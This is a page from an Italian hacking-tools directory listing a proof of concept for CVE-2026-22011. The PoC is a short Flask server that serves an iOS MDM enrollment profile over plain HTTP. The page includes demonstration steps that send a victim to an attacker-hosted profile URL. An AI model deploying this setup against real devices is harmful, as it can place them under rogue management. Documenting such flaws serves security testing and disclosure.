Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP — Server Flask PoC per CVE-2026-22011 che serve un profilo di registrazione MDM iOS dannoso via HTTP, consentendo l'intercettazione man-in-the-middle e la compromissione del dispositivo. | Kitploit
Strumenti/GitHubGitHub/george0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http
Sicurezza iOSAnalisi delle VulnerabilitàExploitSicurezza di RetePenetration TestingSicurezza Mobile
GitHubgeorge0papasotiriou/cve-2026-22011-ios-mdm-profile-delivery-over-http

CVE-2026-22011-iOS-MDM-Profile-Delivery-over-HTTP

Server Flask PoC per CVE-2026-22011 che serve un profilo di registrazione MDM iOS dannoso via HTTP, consentendo l'intercettazione man-in-the-middle e la compromissione del dispositivo.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
16 giorni faNon ancora revisionato

CVE-2026-22011 – Consegna del profilo MDM iOS su HTTP

Codice del programma (Server MDM Python Flask)

root@kitploit:~
# mdm_server.py - Serves enrollment profile over plain HTTP
from flask import Flask, send_file

app = Flask(__name__)
@app.route('/enroll.mobileconfig')
def serve_profile():
    # Vulnerability: profile delivered without HTTPS
    return send_file('profile.mobileconfig', mimetype='application/x-apple-aspen-config')

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

CVE-2026-22011 – Consegna del profilo MDM iOS su HTTP

Severity: High

Panoramica

Un profilo di enrollment MDM viene servito tramite HTTP in chiaro senza crittografia né verifica della firma digitale. Un attaccante sulla stessa rete può intercettare la richiesta e sostituire il profilo con uno dannoso, ottenendo privilegi di gestione del dispositivo.

Dettagli della vulnerabilità

  • Tipo: Man‑in‑the‑Middle / Trasporto non sicuro
  • Impatto: Compromissione totale del dispositivo tramite un MDM rogue.
  • Causa principale: L'URL del profilo è HTTP e iOS non impone HTTPS per l'enrollment MDM (dipende dalla configurazione), consentendo l'intercettazione.

Dimostrazione dell'exploit

Avvia il server HTTP dell'attaccante:

root@kitploit:~
python mdm_server.py

Quando la vittima visita http://attacker/enroll.mobileconfig, il profilo dannoso viene scaricato.

Scarica lo strumento